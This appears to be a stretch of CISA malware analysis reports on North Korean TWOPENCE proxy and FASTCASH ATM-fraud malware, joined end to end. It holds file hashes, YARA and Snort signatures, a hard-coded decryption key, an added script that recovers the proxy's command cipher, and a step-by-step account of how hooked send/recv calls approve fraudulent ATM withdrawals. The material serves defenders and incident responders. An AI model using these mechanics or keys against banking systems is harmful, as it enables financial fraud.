McAfee GenericRXFQ-MX!97AAF130CFA2
Microsoft Security Essentials Trojan:Win32/Alreay
NANOAV Trojan.Win32.Alreay.ettzed
NetGate Trojan.Win32.Malware
Sophos Troj/Banker-GUU
Symantec Trojan.Gen.2
TrendMicro Trojan.79245AFC
TrendMicro House Call Trojan.79245AFC
VirusBlokAda TrojanBanker.Alreay
Zillya! Trojan.Alreay.Win32.42
YARA Rules
  • rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan (the same rule as listed under aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83 above)
ssdeep Matches
99 aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83
PE Metadata
Compile Date 2017-02-20 06:09:30-05:00
Import Hash 6b8fa355d78d649f199232a25e22d630
PE Sections
MD5 Name Raw Size Entropy
bb573973d723ebac15a2dd783a56921f header 1024 2.372576
e6412e7fb561ead2b3eddef9bafd3518 .text 198656 6.554337
a9890fd54b24cf53425649a92fe290ad .rdata 18432 5.115959
884e0d48d1830995eeade874d295ced0 .data 5632 3.201975
0e79f25ba5ec9ae1502fe80ec7b08f79 .reloc 9216 5.674607
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38

Tags

HIDDEN-COBRA, backdoor, proxy, trojan

Details
Name 70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38
Size 1637888 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 3c9e71400b72cc0213c9c3e4ab4df9df
SHA1 bdb632b27ddb200693c1b0b80819a7463d4e7a98
SHA256 70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38
SHA512 c7a02fadb9fbbe0cf05dddd6a78cbf48b9030638420b421b4ff83816ae1cabbe54656b4e1c8e4020cacab93388934b6c79d3d21fe560ed4c7131ad5eba481ed0
ssdeep 24576:5gDgaE2r55ENJSOZ8jsAMZMF2kPupVevS6ieT17cZ/hJMIYO0:+D9vrrs8OZxZI+wvTTahqO
Entropy 7.956784
Antivirus
Ahnlab Trojan/Win32.Agent
Antiy Trojan/Win32.AGeneric
Avira TR/Crypt.TPM.Gen
BitDefender Gen:Variant.Symmi.79278
Comodo Malware
ESET Win32/Spy.Banker.AECT trojan
Emsisoft Gen:Variant.Symmi.79278 (B)
K7 Trojan ( 0040f4ef1 )
Lavasoft Gen:Variant.Symmi.79278
McAfee Generic Trojan.ej
Microsoft Security Essentials TrojanSpy:Win32/Banker
NANOAV Trojan.Win32.TPM.etiucd
Quick Heal Trojan.Generic
Sophos Troj/Agent-AXNK
Symantec Trojan.Gen.2
TrendMicro BKDR_KL.22A80489
TrendMicro House Call BKDR_KL.22A80489
VirusBlokAda Backdoor.Agent
Zillya! Backdoor.Agent.Win32.64626
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2017-02-20 06:09:30-05:00
Import Hash baa93d47220682c04d92f7797d9224ce
PE Sections
MD5 Name Raw Size Entropy
a32e7b28831808e208355ae637e006f0 header 4096 0.814733
ca42a315c5287101ffdf2d7843b74d34   119296 7.972251
d41d8cd98f00b204e9800998ecf8427e .rsrc 0 0.000000
9e66a842d63673e7febfc6646ea43c43 .idata 512 1.308723
5668c4714f706c7f669afb1e7f9c6ba7   512 0.260771
de90eb0d146d89f2c2dd76ecf17ea09e dworqjxn 1512960 7.955321
4857cc05e1ea968cfc978d53f2f34126 omrcmqfn 512 3.378388
Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118. Its two unnamed sections and its randomly named sections (dworqjxn, omrcmqfn) with entropy near 8.0 indicate that the file is packed, which is consistent with the string-based YARA rule above not matching it; the command strings will only be visible after unpacking or in a memory dump of the running process.

8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1

Tags

HIDDEN-COBRA, proxy, spyware, trojan

Details
Name 8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1
Size 480768 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 889e320cf66520485e1a0475107d7419
SHA1 f5fc9d893ae99f97e43adcef49801782daced2d7
SHA256 8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1
SHA512 8da0ab0b3072b3966c5e32c22e7ac5654ff3923b3cf28cc895ae10d520a27bb70360e4d94e54422033aa7c7527d10774ab6d8b8569bab8b6909eb3eab40d62bc
ssdeep 6144:sdqAqUok+00rm9TOi9Vc7/VtXvWLnJlh+efvoRKmjbL/xY4fTKKWSFle3IDgDi2C:xABogwttXuLnJlkkiKU/xtKYydF9iIU
Entropy 6.465490
Antivirus
Ahnlab Trojan/Win32.Alreay
Antiy Trojan/Win32.BTSGeneric
Avira TR/Spy.Banker.xbkax
BitDefender Trojan.Generic.20466258
ClamAV Win.Trojan.Agent-6971031-0
Comodo Malware
ESET a variant of Win64/Spy.Banker.AX trojan
Emsisoft Trojan.Generic.20466258 (B)
Ikarus Trojan-Spy.Win64.Agent
K7 Spyware ( 00504e561 )
Lavasoft Trojan.Generic.20466258
McAfee Trojan-FLEP!889E320CF665
Microsoft Security Essentials TrojanSpy:Win64/Cyruslish.A
NANOAV Trojan.Win64.Alreay.elwnmb
Sophos Troj/Banker-GSY
Symantec Trojan.Gen.2
TrendMicro BKDR64_.D1FB2862
TrendMicro House Call BKDR64_.D1FB2862
VirusBlokAda TrojanBanker.Alreay
Zillya! Trojan.Banker.Win64.148
YARA Rules
  • rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan (the same rule as listed under aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83 above)
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-08-26 00:11:49-04:00
Import Hash 1cd9192feb9402723bdada868b8c98de
PE Sections
MD5 Name Raw Size Entropy
2fb3e4c0734998f9629ba86c4e7c6e99 header 1024 2.603055
9319545c7ac53b81b3d56a722dad8ef1 .text 364032 6.423307
e406c9d4f3bdbdbab8191bb701e4ff57 .rdata 81920 6.056842
6198d24ba115f17c5597e2773cb51a75 .data 8704 3.090138
f7b6096db3b9ad55c3bad4c47de6d5b4 .pdata 22016 5.758547
ddf5f86578d6de91c211211bdd72f63f .reloc 3072 3.181451
Description

This file is a 64-bit Windows DLL (PE32+, x86-64). It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

Mitigation

The following Snort rules were provided by a CISA trusted third party:

# The following Snort rule can be used to detect the proxy handshake
alert tcp any any -> any any (msg:"Proxy handshake detected"; content:"|a7 00 a7 00 fb 00 b0 00 8e 00 c5 00 b0 00 48 00 17 00 c5 00 8b 00 6a 00 8e 00 ec 00 f3 00 fe 00 d9 00 f3 00 a7 00 6a 00 ec 00 a7 00 b0 00 17 00 fc 00 48 00 48 00 09 00 09 00 09 00 48 00 8e 00 ce|"; rev:1; sid:1000001;)

# The following Snort rule can be used to detect the encrypted proxy string kliyent2podklyuchit
alert tcp any any -> any any (msg:"Proxy string kliyent2podklyuchit detected"; content:"|d1 14 23 b3 c7 b2 ac fe 70 0d 1c d1 14 b3 d7 f9 38 23 ac|"; rev:1; sid:1000002;)

# The following Snort rule can be used to detect the encrypted proxy string poluchit
alert tcp any any -> any any (msg:"Proxy string poluchit detected"; content:"|70 0d 14 d7 f9 38 23 ac|"; rev:1; sid:1000003;)

# The following Snort rule can be used to detect the encrypted proxy string pereslat
alert tcp any any -> any any (msg:"Proxy string pereslat detected"; content:"|70 c7 be c7 c9 14 ab ac|"; rev:1; sid:1000004;)

Note: as published by the third party all four rules carried sid:1; Snort rejects two rules with the same gid:sid pair, so each rule above has been given a placeholder sid in the local (1000000+) range that should be reassigned per local policy. The two 8-byte content matches are short enough to occur by chance in arbitrary binary traffic on any port, so treat hits on them as leads to be confirmed against the longer kliyent2podklyuchit pattern or the handshake rule rather than as standalone detections.
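The handshake and command exchange described in the analysis above and the Snort signatures just listed can be tied together. The following is a worked example added here; it is not code from the report, from the CISA trusted third party, or from the TWOPENCE tool. It pairs the three encrypted command strings published in the Snort rules with their plaintexts from the YARA rule and recovers the byte mapping between them. The assumption that the routine is a position-independent single-byte substitution goes beyond what the report states; the three published pairs (17 distinct characters, several of them repeated at different positions) are consistent with it, and the script checks that consistency before using the table. The derived ciphertext for "ssylka" and the sample payload are products of that assumption, not published indicators.

```python
# Added worked example; not code from the CISA report or the TWOPENCE tool.
# The three encrypted command strings published in the Snort rules, paired
# with the plaintext commands in the YARA rule, are used to recover part of
# the proxy's "custom encryption routine".
#
# Assumption (not stated in the report): the routine substitutes one
# ciphertext byte per plaintext byte, independent of position. The three
# published pairs are consistent with that, and build_table() refuses to
# proceed if they were not.
from typing import Dict, List, Optional, Tuple

# Plaintext (YARA $cmd strings) -> ciphertext (Snort content) pairs from the report.
KNOWN_PAIRS: List[Tuple[str, bytes]] = [
    ("kliyent2podklyuchit",
     bytes.fromhex("d11423b3c7b2acfe700d1cd114b3d7f93823ac")),
    ("poluchit", bytes.fromhex("700d14d7f93823ac")),
    ("pereslat", bytes.fromhex("70c7bec7c914abac")),
]

# Remaining commands named in the YARA rule; encodable only where every byte
# of the command is covered by the recovered table.
OTHER_COMMANDS: List[str] = ["ssylka", "ustanavlivat", "derzhat", "vykhodit", "Nachalo"]


def build_table(pairs: List[Tuple[str, bytes]] = KNOWN_PAIRS) -> Dict[int, int]:
    """Recover the plaintext-byte -> ciphertext-byte map, checking that every
    repeated letter maps to the same byte in every position (and vice versa)."""
    table: Dict[int, int] = {}
    inverse: Dict[int, int] = {}
    for plain, cipher in pairs:
        if len(plain) != len(cipher):
            raise ValueError(f"length mismatch for {plain!r}")
        for p, c in zip(plain.encode("ascii"), cipher):
            if table.get(p, c) != c or inverse.get(c, p) != p:
                raise ValueError(f"not a position-independent substitution at {chr(p)!r}")
            table[p] = c
            inverse[c] = p
    return table


def encode(plaintext: str, table: Dict[int, int]) -> Optional[bytes]:
    """Encrypt a command with the recovered table; None if any byte is unknown."""
    out = bytearray()
    for p in plaintext.encode("ascii"):
        if p not in table:
            return None
        out.append(table[p])
    return bytes(out)


def decode(ciphertext: bytes, table: Dict[int, int]) -> str:
    """Decrypt with the recovered table; bytes not yet recovered print as '?'."""
    inverse = {c: p for p, c in table.items()}
    return "".join(chr(inverse[c]) if c in inverse else "?" for c in ciphertext)


def snort_content(data: bytes) -> str:
    """Render bytes in Snort content:"|..|" hex notation."""
    return "|" + " ".join(f"{b:02x}" for b in data) + "|"


def scan_payload(payload: bytes, table: Dict[int, int]) -> List[Tuple[int, str]]:
    """Find encrypted command strings anywhere in a TCP payload (what the Snort
    rules do), returning (offset, decoded command) for each hit."""
    hits: List[Tuple[int, str]] = []
    for cmd in [p for p, _ in KNOWN_PAIRS] + OTHER_COMMANDS:
        enc = encode(cmd, table)
        if enc is None:
            continue
        start = 0
        while (idx := payload.find(enc, start)) != -1:
            hits.append((idx, cmd))
            start = idx + 1
    return sorted(hits)


def demo() -> List[Tuple[int, str]]:
    """Constructed sample payload: filler bytes around an encrypted "pereslat"
    (start proxying) and an encrypted "ssylka" (whose ciphertext is derived
    from the table, not published in the report)."""
    table = build_table()
    payload = b"\xde\xad" + encode("pereslat", table) + b"\x00\x00" + encode("ssylka", table)
    return scan_payload(payload, table)


if __name__ == "__main__":
    t = build_table()
    print(f"recovered {len(t)} plaintext bytes")
    print("ssylka ->", snort_content(encode("ssylka", t)))
    print("hits:", demo())
```

If the assumption holds, the table lets an analyst decode the command strings seen in a capture of the proxy's C2 channel and derive candidate content matches for the commands the published Snort set does not cover; anything derived this way should be validated against a sample (the Figure 2 script is the authoritative decoder) before it is deployed as a signature.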

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • August 26, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 26, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, DHS, FBI, and DoD identified Remote Access Tool (RAT) malware variants used by the North Korean government. This malware variant has been identified as FASTCASH for Windows. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. DHS, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

This submission included two unique files. The first file is a malicious application, which can be utilized to inject a dynamic link library (DLL) into a remote Windows process. The second file is a malicious Windows DLL. The DLL contains two functions that can hook callbacks to the Windows application programming interfaces (APIs) “Send” and “Recv” within a targeted process. These hook functions are utilized to intercept traffic received by the target process. In received Financial Messages, the malicious functions will look for targeted Primary Account Numbers (PAN) to deliver a custom response. It appears the malware will target a system on a bank infrastructure, which is designed to process automated teller machine (ATM) transactions.

This updated report includes an additional sample used by advanced persistent threat (APT) cyber actors to target banking payment systems. The sample is man-in-the-middle bank transaction modification malware. Once injected into an executable, it takes control of the send and receive functions in order to identify, log, and modify ISO 8583 messages. ISO 8583 is the international standard for financial transaction card-originated interchange messages. This functionality enables the actor to withdraw more money than is actually available. The malware specifically targets ISO 8583 Point of Sale (POS) system messages, ATM transaction requests, and ATM balance inquiries. The sample uses code from open source repositories on the Internet and modifies the parsing code to support Extended Binary Coded Decimal Interchange Code (EBCDIC) encoding, a character encoding used on IBM mainframe systems in place of the more common ASCII.

For a downloadable copy of IOCs, see [STIX file].

Submitted Files (3)

129b8825eaf61dcc2321aad7b84632233fa4bbc7e24bdf123b507157353930f0 (switch.dll)

39cbad3b2aac6298537a85f0463453d54ab2660c913f4f35ba98fffeb0b15655 (switch.exe)

5cb7a352535b447609849e20aec18c84d8b58e377d9c6365eafb45cdb7ef949b (A2B1A45A242CEE03FAB0BEDB2E4605…)

Findings

129b8825eaf61dcc2321aad7b84632233fa4bbc7e24bdf123b507157353930f0

Tags

HIDDEN-COBRA, trojan

Details
Name switch.dll
Size 118784 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 c4141ee8e9594511f528862519480d36
SHA1 2b22d9c673d031dfd07986906184e1d31908cea1
SHA256 129b8825eaf61dcc2321aad7b84632233fa4bbc7e24bdf123b507157353930f0
SHA512 dfc1ad2cb2df2b79ac0f2254b605a2012b94529ac220350a4075e60b06717918175cff5c22e52765237b78ec4edffd6df20f333e28a405a4339a10288158e7fc
ssdeep 3072:lUGDXTpE8AKDKDOf+8ZagCfG4aAzFdIARrhxg6/ZpDA:+GDXTpFDKDMZagX4aAB2Cg6hpD
Entropy 6.454745
Antivirus
Antiy Trojan/Win32.Tiggre
Avira TR/Spy.Banker.pubvd
BitDefender Trojan.GenericKD.32541173
ClamAV Win.Trojan.Alreay-7189205-0
Comodo Malware
ESET a variant of Win32/NukeSped.GA trojan
Emsisoft Trojan.GenericKD.32541173 (B)
Ikarus Trojan.Spy.Banker
K7 Riskware ( 0040eff71 )
Lavasoft Trojan.GenericKD.32541173
McAfee Trojan-Banking
NANOAV Trojan.Win32.NukeSped.gexoae
Sophos Troj/Banker-GYS
Symantec Trojan Horse
TrendMicro Backdoo.62DC2502
TrendMicro House Call Backdoo.62DC2502
VirusBlokAda BScope.TrojanBanker.Agent
Zillya! Trojan.NukeSped.Win32.183
YARA Rules
  • rule CISA_10257062_01 : ATM_Malware
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10257062"
           Date = "2019-09-26"
           Last_Modified = "20200117_1732"
           Actor = "n/a"
           Category = "Financial"
           Family = "ATM_Malware"
           Description = "n/a"
           MD5_1 = "c4141ee8e9594511f528862519480d36"
           SHA256_1 = "129b8825eaf61dcc2321aad7b84632233fa4bbc7e24bdf123b507157353930f0"
       strings:
           $x3 = "RECV SOCK= 0x%p, BUF= 0x%p, LEN= 0x%08X, RET= %08X, IP= %s, Port= %d" fullword ascii
           $x4 = "init_hashmap succ" fullword ascii
           $x5 = "89*(w8y92r3y9*yI2H28Y9(*y3@*" fullword ascii
       condition:
           ($x3) and ($x4) and ($x5)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-06-22 01:59:31-04:00
Import Hash 0ab159bd939411cb8df935bd9e7b5835
PE Sections
MD5 Name Raw Size Entropy
00f8301c11847b70346d6271098d8f1c header 1024 2.296500
c3bee35076d728ce32b67f5bc66587f3 .text 84992 6.641787
6b094443cad879acc7285f991243ddb0 .rdata 17920 5.170073
11060bd3e49075b78be8670ff46d9a48 .data 7168 4.275765
3637e0cd32608b060e308fdd9742ea97 .reloc 7680 4.792696
Packers/Compilers/Cryptors
Microsoft Visual C++ DLL *sign by CodeRipper
Description

This file is a malicious Windows 32-bit DLL. Upon execution, it attempts to read the file “c:\temp\info.dat”. Analysis of this implant indicates the encrypted file “info.dat” contains the targeted PANs, which are expected to appear in transactions originating from ATM systems. Analysis indicates the malware decrypts “info.dat” using what appears to be the AES algorithm. The 32-character key used for this decryption (the length of an AES-256 key) is displayed below:

–Begin Decryption Key–

89*(w8y92r3y9*yIy(8Y23RHWIEFH238

–End Decryption Key–

The decrypted contents of “info.dat” are then parsed. Sub-components of the file are then further decoded using a hard-coded rotating XOR cipher (Figure 1). The data used as the rotating XOR cipher key is displayed below:

–Begin Rotating XOR Cipher Key–

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

–End Rotating XOR Cipher Key–

This application will not run without the file “info.dat”, which was not available at the time of analysis.

Upon execution, the malware creates the directory “C:\tmp\_DMP” and uses it as a working directory on the targeted system, storing its run-time logs there. It creates a log file named with the format “c:\tmp\_DMP\TMPL_%d_%d.tmp” in this folder and stamps it with the data “HK-Start”.

This binary contains two functions that provide context to the malware’s purpose and capability. Analysis indicates this DLL is injected into a targeted process. In order to capture and analyze incoming network traffic, the malware hooks the “Send” and “Recv” Windows APIs within the targeted process. One of these functions, located at offset “0x00004f60”, appears to search incoming network traffic for “x200” Financial Request Messages (ISO 8583 message type indicator x200, a financial transaction request), such as those generated by an ATM banking system. When the malware captures data it uses the “getpeername” API to get the IP address of the connected host and converts this address to an integer value using the “ntohs” API. If the integer value matches either “16843029” or “33620245”, the malware searches the data for a “Financial Request Message” (Figure 6). If not, it processes the incoming data as normal but still attempts to log it to a file named “c:\tmp\_DMP\TMPL_%d_%d.tmp” in the format RECV SOCK= 0x%p, BUF= 0x%p, LEN= 0x%08X, RET= %08X, IP= %s, Port= %d.

Upon receipt of one of these Financial Request Messages, this structure will create a log file that is named with the following format: “c:\tmp\_DMP\TMPL_%d_%d.tmp”. The format of the data logged in this log file will be as follows:

–Begin Logged Message Data–

Message(msg=%d, ct=%d, pc=%d, sd=%d, pan=%s, date=%s)

–End Logged Message Data–

Upon receipt of a Financial Request Message the malware will decode a portion of the data, which was AES decrypted from the file “info.dat” to see if portions of it match the incoming Financial Request Message (Figure 3). Although the file “info.dat” was not available for analysis, it appears the malware is ensuring the PAN numbers of the incoming message match one of the PAN numbers contained within “info.dat”.

Static analysis indicates the malware utilizes an encrypted file named “blk.dat”. This file is expected to contain a blacklist of ATM transactions, which will be denied by the hook function (Figure 2). This file was not available for analysis.

When the malware receives a request from an ATM that contains a PAN configured in info.dat (Figure 3) and is not on the blacklist in “blk.dat”, it crafts a response and sends it to the ATM system (Figure 4). The response appears to allow the transaction to proceed, potentially letting the actors illegally withdraw money. If the transaction is hijacked and approved, the malware records the success in the encrypted log file “suc.dat”.

If the transaction is rejected because it is on the blacklist in “blk.dat”, the error is logged to the file “err.dat”. If the transaction neither contains a configured PAN nor appears on the blacklist, the malware passes it to the targeted application as normal. When the malware receives an identified Financial Request Message, it logs it to a file named with the format “c:\tmp\_DMP\TMPL_%d_%d.tmp”, using the record format “Message(msg=%d, ct=%d, pc=%d, sd=%d, pan=%s, date=%s)”.

The actual response back to the ATM system will be logged into a file with the filename format “c:\tmp\_DMP\TMPL_%d_%d.tmp”. The format of the data written to this file will be send socket=0x%X, ret=%d, err=%d.

Analysis indicates the Send API is hooked with a function that uses the “getpeername” IP address of the connected host. The IP address of the host is converted using “ntohs” and if it matches one of the values “16843029” or “33620245” the sent traffic will be logged in a file named “c:\tmp\_DMP\TMPL_%d_%d.tmp”. The format of the sent data logged is SEND SOCK= 0x%p, BUF= 0x%p, LEN= 0x%08X, RET= %08X, IP= %s, Port= (Figure 7). Static analysis indicates successful hooks made to the “Send” and “Recv” APIs within the target process will be logged in a file named “c:\tmp\_DMP\TMPL_%d_%d.tmp” with the format “g_hook_flag = %d”.

Screenshots

Figure 1 - Cipher used when decoding data in "info.dat".

Figure 2 - API "Recv" hook checking for incoming Financial Request Message for a targeted PAN.

Figure 3 - The malware searching for targeted PANs.

Figure 4 - Malware crafting and sending responses to the ATM.

Figure 5 - Hook function either searching network traffic for Financial Message or logging it and sending to the "RECV" API.

Figure 6 - "RECV" Hook API function checking if the connected host is one of the two IP addresses.

Figure 7 - Logging outbound traffic to the two specific IP addresses.

39cbad3b2aac6298537a85f0463453d54ab2660c913f4f35ba98fffeb0b15655

Tags

HIDDEN-COBRA, trojan

Details
Name switch.exe
Size 67448 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 89081f2e14e9266de8c042629b764926
SHA1 730c1b9e950932736fc4b02cbdb4e4e891485ac2
SHA256 39cbad3b2aac6298537a85f0463453d54ab2660c913f4f35ba98fffeb0b15655
SHA512 bbb5aa4d8e7a011daff71774ee9c74fa4d14627de1c25e0437c879bd1cd137223d5c2fb20fd101a511a95e59d91ea884b0947229ee67e40a4a24350573fb9e54
ssdeep 768:aQ1PWoWzXyjJsTKJUniYs1pdLn4nDT622YuYDIhscWTJqLPNofEDy9nAXmIEHbKa:aQ5WDziX+nD0LWT6FYZDgs5ULPIJEYp
Entropy 6.396614
Antivirus
Ahnlab HackTool/Win32.Injector
Antiy Trojan[Banker]/Win32.Alreay
ClamAV Win.Trojan.Alreay-7189192-0
Comodo Malware
ESET a variant of Generik.CWSORYC trojan
Emsisoft Gen:Variant.Ursu.634943 (B)
Ikarus Trojan.Inject
K7 Riskware ( 0040eff71 )
McAfee Trojan-Banking
Microsoft Security Essentials Trojan:Win32/LazInjector.DD!MSR
NANOAV Trojan.Win32.Alreay.geqrko
Sophos Troj/Banker-GYS
Symantec Trojan Horse
TrendMicro TROJ_NO.4FADD924
TrendMicro House Call TROJ_NO.4FADD924
VirusBlokAda TrojanBanker.Alreay
Zillya! Trojan.Alreay.Win32.96
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-06-13 02:17:06-04:00
Import Hash c9febdea3218b92a46f739082f26471e
PE Sections
MD5 Name Raw Size Entropy
cde81f1500263860f325ee8f80c483ce header 1024 2.497464
a8c0a36524287fef367821e833a68350 .text 38912 6.518662
e1c66ff8e5f0e1909e2691360c974420 .rdata 10752 4.878020
22783e6c2539d6828f3d42b030ca08e9 .data 4096 2.117927
81195ca9b22c050f79e44175e9e7150e .rsrc 512 5.105006
36571bcb45b1ae18dfcf7edc8c5c3d4a .reloc 3584 4.791228
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file is a malicious 32-bit Windows executable. It is a command-line utility. Static analysis indicates its primary purpose is to allow a user to inject a DLL into a remote process.

5cb7a352535b447609849e20aec18c84d8b58e377d9c6365eafb45cdb7ef949b

Tags

HIDDEN-COBRA, trojan

Details
Name A2B1A45A242CEE03FAB0BEDB2E460587
Size 130560 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 a2b1a45a242cee03fab0bedb2e460587
SHA1 e9c9ef312370d995d303e8fc60de4e4765436f58
SHA256 5cb7a352535b447609849e20aec18c84d8b58e377d9c6365eafb45cdb7ef949b
SHA512 4ced785089832287d634c77c2b5fb16efb2147b75da9014320c98d1bc0933504bfba77273576c35b97548d25acb88a0f2944cbef6a78509f945a8502f8910da8
ssdeep 3072:j5KO2SQhF+VJbGHMjjNNyCkeZjDYJklGCx:oO2SQT+nGHADyAZjJwC
Entropy 6.431962
Antivirus
VirusBlokAda BScope.TrojanBanker.Agent
YARA Rules
  • rule CISA_3P_10257062 : HiddenCobra FASTCASH trojan
    {
       meta:
           Author = "CISA Trusted Third Party"
           Incident = "10257062"
           Date = "2020-08-11"
           Actor = "Hidden Cobra"
           Category = "Trojan"
           Family = "FASTCASH"
           Description = "Detects HiddenCobra FASTCASH samples"
           MD5_1 = "a2b1a45a242cee03fab0bedb2e460587"
           SHA256_1 = "5cb7a352535b447609849e20aec18c84d8b58e377d9c6365eafb45cdb7ef949b"
       strings:
           $sn_config_key1 = "Slsklqc^mNgq`lyznqr[q^123"
           $sn_config_key2 = "zRuaDglxjec^tDttSlsklqc^m"
           $sn_logfile1 = "C:\\intel\\_DMP_V\\spvmdl.dat"
           $sn_logfile2 = "C:\\intel\\_DMP_V\\spvmlog_%X.dat"
           $sn_logfile3 = "C:\\intel\\_DMP_V\\TMPL_%X.dat"
           $sn_logfile4 = "C:\\intel\\mvblk.dat"
           $sn_logfile5 = "C:\\intel\\_DMP_V\\spvmsuc.dat"
       condition:
           all of ($sn*)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-07-03 08:11:16-04:00
Import Hash 76e8a4f811b021cf503340a0077515cc
PE Sections
MD5 Name Raw Size Entropy
cbe7e7fdab96c22785fa8d7c03ca6b2b header 1024 2.429436
03d36f4d9ae3e002027c981c399ab8c6 .text 89600 6.630313
d1f983704c508544b315d577fe3563e1 .rdata 23040 5.215776
a4b79dca294053725e2b2091453d9d85 .data 8192 4.358771
d762ef71411860ae50212e14c0a5ba72 .rsrc 512 5.115767
2e4eb6056385f6f721d970cafe65bebe .reloc 8192 4.774185
Packers/Compilers/Cryptors
Microsoft Visual C++ DLL *sign by CodeRipper
Description

The file uses a configuration file, a blacklist, and a series of log files:

–Begin files–
C:\intel\myconf.ini: Configuration file that contains account numbers (encrypted)
C:\intel\myblk.dat: Blacklisted account numbers (encrypted)
C:\intel\_DMP_V\spvmlog_<PID>.dat: Logs general messages and errors.
Entry Format: [<YYYY-MM-DD HH:MM:SS.sss>][PID:<PID>][TID:<TID>] <Message>
C:\intel\_DMP_V\spvmdl.dat: Logs API hooking/unhooking success and failure.
Entry Format:
Hook Success Entry: ‘Windows’
Hook Error Entry: ‘Linux’
UnHook Success Entry: ‘Acer’
UnHook Error Entry: ‘Lenovo’
C:\intel\_DMP_V\TMPL<PID>.dat: Logs Send/Receive Message metadata
Entry Format:
Recv Entry: ‘recv – SOCK=<socket_id>, Addr=<IP>, Port=<Port>, pBuf=<data>, size=<datasize>’
Send Entry: ‘send – SOCK=<socket_id>, Addr=<IP>, Port=<Port>, size=<datasize>’
